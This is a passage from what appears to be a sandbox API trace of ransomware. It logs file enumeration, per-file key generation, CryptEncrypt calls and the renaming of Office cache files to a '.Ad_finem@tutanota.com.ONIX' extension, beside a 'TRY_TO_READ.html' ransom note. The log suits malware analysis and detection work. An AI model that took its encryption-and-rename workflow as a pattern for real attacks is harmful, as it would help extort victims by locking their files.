ftCreationTime.dwLowDateTime=0x30bcff70, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30bcff70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bcff70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0088.400] CloseHandle (hObject=0x3cc) returned 1 [0088.400] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0088.401] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x1b, wMilliseconds=0x397)) [0088.401] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0088.401] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0088.401] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0088.401] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0088.401] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0088.402] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.402] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.402] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x461440 [0088.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0088.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458390 | out: hHeap=0x410000) returned 1 [0088.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472078 | out: hHeap=0x410000) returned 1 [0088.402] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30bcff70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bcff70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e970 [0088.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0088.402] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0088.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458390 [0088.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0088.403] GetLastError () returned 0x0 [0088.403] FindNextFileW (in: hFindFile=0x48e970, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30bcff70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bcff70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0088.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0088.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458390 [0088.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0088.403] GetLastError () returned 0x0 [0088.403] FindNextFileW (in: hFindFile=0x48e970, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0088.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0088.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0088.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458390 [0088.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0088.403] GetLastError () returned 0x0 [0088.403] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x47c [0088.404] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0088.404] LockFile (hFile=0x47c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x265c00, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.404] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.404] ReadFile (in: hFile=0x47c, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0088.406] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.406] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.406] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0088.406] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0088.406] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", dwFileAttributes=0x80) returned 1 [0088.406] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 80 [0088.406] GetProcessHeap () returned 0x410000 [0088.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x467908 [0088.406] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" [0088.406] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0088.406] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2513920) returned 1 [0088.406] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x265c00 [0088.406] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0088.407] GetProcessHeap () returned 0x410000 [0088.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0088.407] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0088.407] WriteFile (in: hFile=0x47c, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0088.409] WriteFile (in: hFile=0x47c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0088.410] WriteFile (in: hFile=0x47c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0088.411] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x265c00) returned 0x3680020 [0088.411] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x265c00) returned 0x38f0020 [0088.411] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.411] ReadFile (in: hFile=0x47c, lpBuffer=0x3680020, nNumberOfBytesToRead=0x265c00, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x265c00, lpOverlapped=0x0) returned 1 [0088.644] UnlockFile (hFile=0x47c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x265c00, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.644] CloseHandle (hObject=0x47c) returned 1 [0088.682] GetProcessHeap () returned 0x410000 [0088.682] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0088.682] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0088.685] GetProcessHeap () returned 0x410000 [0088.685] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0088.685] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0088.685] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0088.685] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0088.685] FindNextFileW (in: hFindFile=0x48e970, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0088.686] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0088.686] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0088.686] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458390 [0088.686] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0088.686] GetLastError () returned 0x0 [0088.686] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x47c [0088.686] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0088.686] LockFile (hFile=0x47c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5aa, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.686] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.686] ReadFile (in: hFile=0x47c, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0088.690] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.690] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.691] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0088.691] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0088.691] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", dwFileAttributes=0x80) returned 1 [0088.691] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 80 [0088.691] GetProcessHeap () returned 0x410000 [0088.691] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x467908 [0088.691] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" [0088.691] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0088.691] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1450) returned 1 [0088.691] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x5aa [0088.691] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0088.691] GetProcessHeap () returned 0x410000 [0088.691] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0088.691] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0088.692] WriteFile (in: hFile=0x47c, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0088.781] WriteFile (in: hFile=0x47c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0088.782] WriteFile (in: hFile=0x47c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0088.800] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5aa) returned 0x4b5b28 [0088.800] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5aa) returned 0x4b60e0 [0088.800] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.800] ReadFile (in: hFile=0x47c, lpBuffer=0x4b5b28, nNumberOfBytesToRead=0x5aa, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b5b28*, lpNumberOfBytesRead=0x367f44c*=0x5aa, lpOverlapped=0x0) returned 1 [0088.800] SetFilePointer (in: hFile=0x47c, lDistanceToMove=-1450, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.800] WriteFile (in: hFile=0x47c, lpBuffer=0x4b60e0*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b60e0*, lpNumberOfBytesWritten=0x367f44c*=0x5aa, lpOverlapped=0x0) returned 1 [0088.802] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b5b28 | out: hHeap=0x410000) returned 1 [0088.802] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b60e0 | out: hHeap=0x410000) returned 1 [0088.802] UnlockFile (hFile=0x47c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5aa, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.802] CloseHandle (hObject=0x47c) returned 1 [0088.804] GetProcessHeap () returned 0x410000 [0088.804] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0088.804] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0088.806] GetProcessHeap () returned 0x410000 [0088.806] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0088.806] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0088.806] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0088.806] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0088.806] FindNextFileW (in: hFindFile=0x48e970, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0088.806] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0088.806] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0088.806] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458390 [0088.806] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0088.806] GetLastError () returned 0x0 [0088.806] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x47c [0088.806] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0088.807] LockFile (hFile=0x47c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x97f3f4, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.807] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.807] ReadFile (in: hFile=0x47c, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0088.808] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.808] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.809] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0088.809] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0088.809] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", dwFileAttributes=0x80) returned 1 [0088.809] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 73 [0088.809] GetProcessHeap () returned 0x410000 [0088.809] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0088.809] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" [0088.809] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0088.809] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=9958388) returned 1 [0088.809] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x97f3f4 [0088.809] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0088.809] GetProcessHeap () returned 0x410000 [0088.809] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0088.809] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0088.809] WriteFile (in: hFile=0x47c, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0088.902] WriteFile (in: hFile=0x47c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0088.903] WriteFile (in: hFile=0x47c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0088.921] RtlAllocateHeap 